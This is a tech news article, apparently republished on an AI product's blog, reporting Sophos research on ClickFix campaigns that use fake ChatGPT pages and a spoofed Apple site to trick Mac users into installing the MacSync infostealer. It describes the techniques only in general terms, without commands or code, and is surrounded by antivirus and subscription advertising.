Ask Runable forDesign-Driven General AI AgentTry Runable For Free
Runable
Back to Blog
Technology6 min read

'The prevailing wisdom used to be that macOS was at lower risk of malware infection compared to Windows...that’s no longer the case': Experts warn Mac infostealers are on the rise - here's how to stay safe | TechRadar

Three distinct campaigns targeting Mac recently spotted by Sophos Discover insights about 'the prevailing wisdom used to be that macos was at lower risk of malw

TechnologyInnovationBest PracticesGuideTutorial
'The prevailing wisdom used to be that macOS was at lower risk of malware infection compared to Windows...that’s no longer the case': Experts warn Mac infostealers are on the rise - here's how to stay safe | TechRadar
Listen to Article
0:00
0:00
0:00

'The prevailing wisdom used to be that mac OS was at lower risk of malware infection compared to Windows...that’s no longer the case': Experts warn Mac infostealers are on the rise - here's how to stay safe | Tech Radar

Overview

'The prevailing wisdom used to be that mac OS was at lower risk of malware infection compared to Windows...that’s no longer the case': Experts warn Mac infostealers are on the rise - here's how to stay safe

Three distinct campaigns targeting Mac recently spotted by Sophos

Details

When you purchase through links on our site, we may earn an affiliate commission. Here’s how it works.

Fake AI tools, Chat GPT conversations, and Apple site used to spread Mac Sync infostealer

Latest variant employs loaders, Apple Script, and in‑memory execution for stealth

Security researchers have warned of a rise in ongoing malware campaigns targeting mac OS users, leveraging malicious ads, legitimate hosting services, brand impersonation, fake Chat GPT conversations, and a little bit of old-fashioned social engineering to infect the victims.

A new report from Sophos claims there were at least three distinct Click Fix campaigns running over the last three months. Click Fix is a known method, in which crooks would present users with a fake problem and, at the same time, offer a solution - which can be anything from a fake CAPTCHA to a “locked” document.

Whatever it is, “solving” the problem requires running a Terminal command which downloads and installs the Mac Sync infostealer.

Microsoft warns infostealer malware is 'rapidly expanding beyond traditional Windows-focused campaigns' and targeting Mac devices

Dangerous new malware targets mac OS devices via Open VSX extensions - here's how to stay safe

'mac OS is becoming a more attractive target, and the tools attackers use are becoming more capable and more professional': Experts warn 'convincing' fake Clean My Mac installs target Apple users to empty crypto wallets

In the first campaign, the “problem” was installing an AI browser. Users searching for a specific keyword would see an ad at the top of the Google search results which would lead to a fake browser download page, hosted on sites.google.com.

The site looks authentic and spoofs Open AI’s Chat GPT Atlas - but to download, users are told to bring up the Terminal and paste a specific command.

The second campaign is somewhat different because instead of relying on a website, the crooks would create a Chat GPT conversation.

Each conversation with the tool has a unique identifier, and it can be shared with other people using the “share” feature. Now, crooks would create a conversation that instructed how to download “Mac system cleaner apps” and similar tools which, again, would trick victims into downloading the infostealer. Then, they would advertise that conversation on Google to improve the perceived legitimacy.

The third campaign described in the Sophos report impersonates the legitimate Apple site and delivers a significantly evolved variant of the Mac Sync infostealer. Unlike the earlier campaigns, this one uses a multistage loader-as-a-service model, dynamic Apple Script payloads, and in‑memory execution to maximize stealth and persistence.

“The prevailing wisdom used to be that mac OS was at lower risk of malware infection compared to Windows, due to a native suite of security features that forced threat actors to adopt different, sometimes technically challenging, techniques,” the researchers explained.

“That’s no longer the case (and hasn’t been for some time, as we noted in September 2024). Mainstream malware now regularly affects mac OS users – particularly when it comes to infostealers, which regularly account for a significant portion of all the mac OS detections we see in telemetry. We expect this region of the threat landscape to keep evolving, and rapidly – but, as always, Sophos will evolve with it. We’ll continue to monitor for new variants, update protection and detection information as appropriate, and publish research on this aspect of the threat landscape as data becomes available.”

➡️ Read our full guide to the best antivirus

  1. Best overall: Bitdefender Total Security
  2. Best for families: Norton 360 with Life Lock
  3. Best for mobile: Mc Afee Mobile Security

Follow Tech Radar on Google News and add us as a preferred source to get our expert news, reviews, and opinion in your feeds. Make sure to click the Follow button!

And of course you can also follow Tech Radar on Tik Tok for news, reviews, unboxings in video form, and get regular updates from us on Whats App too.

Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, Io T, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.

You must confirm your public display name before commenting

1 Apple toasts 'the crazy ones' in 50-year celebration — we hope it's a sign

2 Just got a Nintendo Switch 2 for Pokémon Pokopia? Keep your new console safe with these cases and screen protectors

3'In 2026, cybercrime has reached a point of total convergence': New research claims AI attacks are taking over — so how can your business stay safe?

4 Play Station users in the UK could be collectively awarded billions in compensation for 'excessive and unfair' Play Station Store charges in class-action lawsuit against Sony

5 You Tube TV’s cheaper plans are here — this is what you can expect from the new packages

Tech Radar is part of Future US Inc, an international media group and leading digital publisher. Visit our corporate site.

© Future US, Inc. Full 7th Floor, 130 West 42nd Street, New York, NY 10036.

Key Takeaways

  • 'The prevailing wisdom used to be that mac OS was at lower risk of malware infection compared to Windows

  • Three distinct campaigns targeting Mac recently spotted by Sophos

  • When you purchase through links on our site, we may earn an affiliate commission

  • Fake AI tools, Chat GPT conversations, and Apple site used to spread Mac Sync infostealer

  • Latest variant employs loaders, Apple Script, and in‑memory execution for stealth

Cut Costs with Runable

Cost savings are based on average monthly price per user for each app.

Which apps do you use?

Apps to replace

ChatGPTChatGPT
$20 / month
LovableLovable
$25 / month
Gamma AIGamma AI
$25 / month
HiggsFieldHiggsField
$49 / month
Leonardo AILeonardo AI
$12 / month
TOTAL$131 / month

Runable price = $9 / month

Saves $122 / month

Runable can save upto $1464 per year compared to the non-enterprise price of your apps.

Start saving with Runable todayContact us for any pricing questions